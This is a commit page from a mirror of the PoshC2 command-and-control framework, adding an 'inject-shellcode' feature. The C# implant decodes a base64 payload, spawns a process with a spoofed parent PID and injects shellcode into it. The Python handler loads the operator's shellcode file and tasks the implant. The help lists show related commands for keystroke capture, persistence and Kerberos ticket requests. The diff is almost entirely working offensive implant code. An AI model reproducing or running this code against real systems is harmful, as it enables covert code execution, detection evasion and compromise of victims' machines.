infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added Inject-Shellcode

chunking
benpturner 2018-12-28 22:59:54 +00:00
parent 9fa1e7636f
commit 86f58cf14e
3 changed files with 32 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
Files/Sharp.cs
View File

@ -392,26 +392,20 @@ public class Program
if (c.ToLower().StartsWith("inject-shellcode")){
string migrate = Regex.Replace(c, "inject-shellcode ", "", RegexOptions.IgnoreCase);
migrate = Regex.Replace(migrate, "inject-shellcode", "", RegexOptions.IgnoreCase);
if (!String.IsNullOrEmpty(migrate)) {
Program.proc = migrate;
string newProc = Regex.Replace(c, "inject-shellcode ", "", RegexOptions.IgnoreCase);
newProc = Regex.Replace(newProc, "inject-shellcode", "", RegexOptions.IgnoreCase);
if (!String.IsNullOrEmpty(newProc) && newProc.Length > 5) {
Program.proc = newProc;
}
output = scode + Program.proc;
object[] args = new object[3];
args[0] = null; // parent process id
args[1] = @"c:\windows\system32\netsh.exe"; //process name
args[2] = true; //suspended?
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
byte[] payload = Convert.FromBase64String(Program.scode);
var loadedType = LoadSomething("ProcHandler, Inject, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
output = xxx.ToString();
// OpenProcess
// VirtualAllocEx
// WriteProcessMemory
// CreateRemoteThread
var loadedType = LoadSomething("PPIDSpoofer, Inject, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
uint procID = (uint)loadedType.Assembly.GetType("PPIDSpoofer").InvokeMember("SharpCreateProcess", BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { null, Program.proc, true}, null, null, null);
var procShellcode = loadedType.Assembly.GetType("PPIDSpoofer").InvokeMember("InjectShellcode", BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { (int)procID, payload}, null, null, null);
output = stringOutput.ToString();
}

3
Help.py
View File

@ -47,6 +47,7 @@ listmodule
run-dll Seatbelt.Program Seatbelt UserChecks
run-exe Rubeus.Program Rubeus asktgt /user:test /rc4:fdfdsfdsfds
start-process net -argumentlist users
inject-shellcode
kill-implant
hide-implant
unhide-implant
@ -388,4 +389,4 @@ COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomd
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]

16
ImplantHandler.py
View File

@ -506,6 +506,22 @@ def runcommand(command, randomuri):
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "inject-shellcode" in command.lower():
check_module_loaded("Inject.dll", randomuri)
readline.set_completer(filecomplete)
path = raw_input("Location of shellcode file: ")
t = tabCompleter()
t.createListCompleter(COMMANDS)
readline.set_completer(t.listCompleter)
try:
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task(command, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])